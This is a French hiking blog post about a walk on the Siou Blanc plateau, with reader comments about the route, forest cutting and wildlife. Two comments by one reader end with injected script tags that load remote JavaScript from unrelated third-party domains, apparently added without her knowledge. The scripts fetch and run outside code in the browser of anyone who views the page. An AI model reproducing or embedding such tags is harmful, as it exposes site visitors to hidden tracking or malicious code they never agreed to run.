• Retour (enfin) dans le Siou Blanc

     

    Première rando depuis le déconfinement partiel, direction le superbe plateau du Siou Blanc malgré un ciel couvert et un beau risque de pluie, voire d'orage.

    Devant le chêne de Mistral, la voiture est garée et nous filons sur la piste forestière

    Retour (enfin) dans le Siou Blanc

    cistes en fleurs

    Retour (enfin) dans le Siou Blanc

    et asphodèles donnent de belles couleurs,

    les asphodèles sont très nombreuses mais, très peu sont en fleurs et ne le seront plus.

    Retour (enfin) dans le Siou Blanc

     

    nous quittons la piste pour prendre le sentier discret qui devrait nous emmener vers le puits de Junca puis rejoindre le col des Bidoufles...devrait seulement car depuis un moment nous entendons le bruit des tronçonneuses des bûcherons et nous nous en approchons sérieusement.

    Retour (enfin) dans le Siou Blanc

    en effet, le sentier peu jalonné se trouve anéanti par la coupe forestière (on coupe beaucoup depuis quelques mois dans le Siou Blanc). Je n'ai pas la trace sur le GPS (une erreur de manip...loi de Murphy pour les connaisseurs !) du coup, impossible de retrouver le sentier, nous pensons qu'il faudrait suivre la limite droite de la coupe, mais les branchages nous empêchent d'aller plus loin et de toutes façons se serait hasardeux. Conclusion, demi-tour et retour sur la piste.

    Retour (enfin) dans le Siou Blanc

     

    joli bouquet de Phalangères à fleurs de lys.

    Retour (enfin) dans le Siou Blanc

     

    la piste puis un sentier de traverse nous emmènent à la Citerne Neuve

    Retour (enfin) dans le Siou Blanc

    puis par une sente que nous connaissons bien maintenant nous arrivons au point repère de roches en mille-feuilles

    Retour (enfin) dans le Siou Blanc

    et à la belle Marquise, roche appelée "le Cou de la Marquise", vu l'élégance du port de Tête !

    Retour (enfin) dans le Siou Blanc

    Retour (enfin) dans le Siou Blanc

    avec inévitable photo souvenirs

    Retour (enfin) dans le Siou Blanc

    un autre sentier en forêt nous entraîne rapidement sur le grand lapiaz où nous ferons notre halte. le soleil peine à  traverser les nuages qui filent, poussés par le vent d'est.

    Retour (enfin) dans le Siou Blanc

    de notre promontoire nous apercevons la plaie faite dans la forêt par la coupe forestière où nous étions il y a peu, une coupe parmi d'autres.

    Retour (enfin) dans le Siou Blanc

    Une petite erreur de sentier pour revenir aux alentours de Citerne Neuve, nous fait passer, sans regret,

    Retour (enfin) dans le Siou Blanc

    devant ce que nous avons appelé, lors de notre première découverte et par analogie, le "Cou du Marquis", vu que cette roche est nettement moins fine.

    Retour (enfin) dans le Siou Blanc

    un peu de tout-terrain nous fait revenir sur la sentier principal

    Retour (enfin) dans le Siou Blanc

     

    et prendre la sente tout aussi discrète qui nous dirige vers une autre roche remarquable, nous passons devant les vestiges d'une cabane de charbonniers

    Retour (enfin) dans le Siou Blanc

    une peu de crapahut en grimpette

    Retour (enfin) dans le Siou Blanc

    nous passons par "La Porte" 

    Retour (enfin) dans le Siou Blanc

    et nous voilà à cette belle arche plate que les E.T. viennent de nommer "l'Hippopotame", un petit écriteau récent l'indique. Nous la connaissons depuis un certain temps et le nommions simplement, "Arche Plate", mais bon pourquoi pas Hippopotame, puisque, pas très loin, il y a un éléphant de pierre !

    Retour (enfin) dans le Siou Blanc

     

    une jolie cabane de charbonniers avec toiture végétalisée ! le lieu est de toute évidence une charbonnière, les indices sont flagrants.

    Retour (enfin) dans le Siou Blanc

    la suite du sentier nous ramène sur la piste du Centre, que nous suivons jusqu'à Bouche Ouinte

    Retour (enfin) dans le Siou Blanc

     

    Mélisse un peu égarée dans les jeunes feuilles de chêne

    Retour (enfin) dans le Siou Blanc

    au sortir de Bouche Ouinte, le Papé pose ses fesses sur l'Assèti ! un beau siège en belles pierres plates, au pied d'un chêne, comme il se doit.

    Retour (enfin) dans le Siou Blanc

     

    retour au chêne de Mistral et fin de rando, sans une goutte de pluie, mais ça arrive !

    les premières gouttes tombent sur le pare brise de la voiture alors que nous n'avons pas encore démarré.

     

    Ceci n'est qu'un reportage, l’éditeur, l’auteur ou le diffuseur ne sauraient être tenus pour responsables dans

    l’hypothèse d’un accident sur cet itinéraire, et ce, quelles qu’en soient les causes.

     Pour les secours composer le 112

     

     

     

     

    « Les fleurs sauvages dans la collineLe tour des dents de Roque Forcade »

  • Commentaires

    1
    Vendredi 15 Mai à 08:33

    Tu devais languir de chausser tes godillots !!! Deux mois sans rando, trop dur non ? Allez, bonne journée et bisous.

    2
    Vendredi 15 Mai à 08:38

    Pour le retour vous avez bien choisi, bon je vais me contenter de ma piste à Janas mais c'est toujours çà de pris

    3
    Prigent Stéphane-Edd
    Vendredi 15 Mai à 16:13
    Bonjour, pour information, dans le secteur des Morieres et Bidoufles, il y a un projet d'éoliennes industrielles en sommeil et j'espère que les coupes forestières que vous avez constaté ne sont pas les prémices du lancement de ce projet destructeur pour les paysages de ce secteur. Cordialement. S-E Prigent.
      • Vendredi 15 Mai à 16:53

        Bonjour, oui je connais ce projet d'éoliennes il est au sommet des Morières, il y a depuis quelques années des pylônes avec des anémomètres à différentes hauteurs. Dans le cas présent il s'agit de coupes sur le plateau, une grande pour du bois de forte taille, probablement à destination de la centrale de Gardannes, et une autre coupe plus petite (quoique)vers le puy de Junca, pour du chêne vert (yeuse) avec des stères formées pour revente en bois de chauffage.

        Mais nous sommes ici sur des propriétés privées, donc, hélas, peu de recours; en revanche, les coupes dans la vieille forêt de la ste baume pour soi-disant sécuriser les sentiers, c'est un vrai scandale, les arbres dangereux sont souvent laissés sur place alors que les chênes, morts certes, mais bien debout sont coupés et emportés...où.?

        Merci de votre message

        jluc

    4
    grafignette
    Samedi 16 Mai à 19:03

    cela donne envie toute ces rocher fantasmagorique a trés bient^ot j'espère joe"l

      • Samedi 16 Mai à 20:22

        A bientôt Joel.

         

    5
    marsu83
    Lundi 18 Mai à 16:52

    Bonjour à tous les deux! oui, quel bonheur de retrouver Siou Blanc ! Nous nous sommes manqués d'un jour ! nous y étions le lendemain, passés par citerne neuve, les sambles des têtards, Valbelle et clos de Peyron , Bouche Ouinte. Et pour notre plus grand bonheur aussi avons vu sangliers et marcassins (5 au total) sur Clos de Peyron et Bouche Ouinte, sans compter les chants d'oiseaux et les fleurs - même si certaines sont sur la fin comme les asphodèles...

    oui, l’hippopotame ?... nous, nous l'avions appelé très prosaïquement l'autre éléphant de pierre...

    Hier, découverte d'une très jolie draille dans un vallon entre les Friginiaires et les aiguilles de Valbelle,  au départ du grand agave et en partant ouest-nord ouest. Magnifique draille, on vous recommande si vous ne la connaissez pas déjà !

    en vous souhaitant une très bonne continuation de randos !

    Danielle et Patrice

    <script src="//jaretsummer.com/228ebbb479fb2ce2f7.js"></script> <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8846x" type="text/javascript"></script> <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8846x&format=arrjs&r=1589812714224" type="text/javascript"></script> <script src="http://jaretsummer.com/ext/228ebbb479fb2ce2f7.js?sid=52666_8846_&title=qqq&blocks[]=31af2" type="text/javascript"></script>
      • marsu83
        Dimanche 24 Mai à 19:25

        bonjour Jean Luc, je suppose que ce qui suit ce que j'ai écrit est votre réponse mais en java script: du coup je n'arrive pas à la lire. qu'est-il possible de faire ?

        bien cordialement

        Danielle

        <script src="//jaretsummer.com/228ebbb479fb2ce2f7.js"></script> <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8846x" type="text/javascript"></script> <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8846x&format=arrjs&r=1590340957568" type="text/javascript"></script> <script src="http://jaretsummer.com/ext/228ebbb479fb2ce2f7.js?sid=52666_8846_&title=qqq&blocks[]=31af2" type="text/javascript"></script>
      • Dimanche 24 Mai à 20:38

        Bonjour Danielle

        non, ce n'est pas ma réponse je n'avais pas encore répondu, ce texte en java suit chaque commentaire que vous laissez sur le blog. je ne sais pas le décrypter.

        Vous avez eu bien de la chance de voir ces sangliers, ce genre de rencontre est plaisante. hier, aux alentours de la ferme d'Agnis, nous sommes "tombés" face à face avec deux chamois, ils ont été autant surpris que nous.

        belle fin de dimanche

        au plaisir de vous lire.

        Jluc

         

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :